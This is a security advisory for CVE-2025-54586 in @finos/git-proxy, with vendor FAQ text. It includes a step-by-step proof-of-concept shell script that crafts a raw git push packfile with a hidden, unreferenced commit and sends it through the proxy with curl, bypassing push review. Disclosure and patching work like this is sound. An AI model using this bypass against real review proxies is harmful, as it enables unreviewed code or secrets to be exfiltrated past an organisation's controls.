Summary
An attacker can inject extra commits into the pack sent to GitHub, commits that aren’t pointed to by any branch. Although these “hidden” commits never show up in the repository’s visible history, GitHub still serves them at their direct commit URLs. This lets an attacker exfiltrate sensitive data without ever leaving a trace in the branch view. We rate this a High‑impact vulnerability because it completely compromises repository confidentiality.
Details
The proxy currently trusts only the ref‑update line (oldOid → newOid) and doesn't inspect the packfile’s contents
Because the code only runs git rev-list oldOid..newOid to compute introducedCommits but never checks which commits actually arrived in the pack, a malicious client can append extra commits. Those “hidden” commits won’t be pointed to by any branch but GitHub still stores and serves them by SHA.
PoC
Prerequisites
- A GitHub Personal Access Token stored in
~/.github-test-pat. - A test repository also registered in git-proxy, e.g.
your-org/test-repo.git, to which you have push rights.
1. Prepare the “visible” and “hidden” commits
# Clone the test repository
git clone http://localhost:8000/your-org/test-repo.git
cd test-repo
# 1. Record the original HEAD
ORIG_COMMIT=$(git rev-parse HEAD)
# 2. Create branch 'foo' and add a visible commit
git checkout -b foo
echo "visible commit" >> file.txt
git add file.txt
git commit -m "Visible commit"
VISIBLE_COMMIT=$(git rev-parse HEAD)
# 3. Go back to the original commit and create a hidden-branch
git checkout $ORIG_COMMIT
git checkout -b hidden-branch
echo "hidden change" > hidden.txt
git add hidden.txt
git commit -m "Hidden commit"
HIDDEN_COMMIT=$(git rev-parse HEAD)
# Return to 'foo'
git checkout foo
2. Push only the visible commit to branch foo
git push --set-upstream origin foo
# An authorized user approves this push via your normal review workflow
3. Build and push a pack containing the hidden commit
Create a script named upload-pack.sh (replace the placeholder variables with the SHAs you recorded above):
#!/usr/bin/env bash
REMOTE_URL="http://localhost:8000/your-org/test-repo.git"
REF_NAME="refs/heads/foo"
ORIG_COMMIT="<<ORIG_COMMIT>>"
NEW_COMMIT="<<VISIBLE_COMMIT>>"
OLD_COMMIT="0000000000000000000000000000000000000000"
HIDDEN_COMMIT="<<HIDDEN_COMMIT>>"
# 1. List all objects for the visible and hidden commits
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${NEW_COMMIT} > objects.txt
git rev-list --objects --no-object-names "^${ORIG_COMMIT}" ${HIDDEN_COMMIT} >> objects.txt
# 2. Pack them into a single packfile
cat objects.txt
git pack-objects --stdout < objects.txt > packfile
# 3. Construct the Git smart‑protocol update header
printf "${OLD_COMMIT} ${NEW_COMMIT} ${REF_NAME}\0 report-status-v2 side-band-64k object-format=sha1 agent=git/2.39.5" > update_line
UPDATE_LINE_LEN="$(wc -c < update_line)"
printf "%04x" $((UPDATE_LINE_LEN + 4)) > output
cat update_line >> output
# Git smart protocol expects a flush packet
PKT_FLUSH="0000"
printf "%s" "${PKT_FLUSH}" >> output
# Append the packfile
cat packfile >> output
# 4. Send the malicious push via curl
curl -u ${USER}:"$(<~/.github-test-pat)" \
-X POST "${REMOTE_URL}/git-receive-pack" \
-H "Content-Type: application/x-git-receive-pack-request" \
-H "Accept: application/x-git-receive-pack-result" \
--user-agent "git/2.42.0" \
--data-binary @output | cat -v
Make it executable:
chmod +x upload-pack.sh
Run it:
./upload-pack.sh
4. Verify the hidden commit
Open in your browser (or via curl):
https://github.com/your-org/test-repo/commit/<<HIDDEN_COMMIT>>
You will see the “Hidden commit”, even though it is not referenced by any branch.
Impact
Data Exfiltration (Confidentiality breach):
Attackers can inject secrets, credentials, or proprietary data into any repository they push to via git-proxy.Undetectable in UI:
Since the hidden commits never appear in branch graphs, standard code review will not surface them.Persistence Window:
GitHub retains unreferenced objects for a period long enough to allow automated retrieval before garbage‑collecting them.
CVE-2025-54586 has a CVSS score of 7.1 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.19.2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-54586? CVE-2025-54586 is a high-severity security vulnerability in @finos/git-proxy (npm), affecting versions <= 1.19.1. It is fixed in 1.19.2.
- How severe is CVE-2025-54586? CVE-2025-54586 has a CVSS score of 7.1 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of @finos/git-proxy are affected by CVE-2025-54586? @finos/git-proxy (npm) versions <= 1.19.1 is affected.
- Is there a fix for CVE-2025-54586? Yes. CVE-2025-54586 is fixed in 1.19.2. Upgrade to this version or later.
- Is CVE-2025-54586 exploitable, and should I be worried? Whether CVE-2025-54586 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-54586 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-54586? Upgrade
@finos/git-proxyto 1.19.2 or later.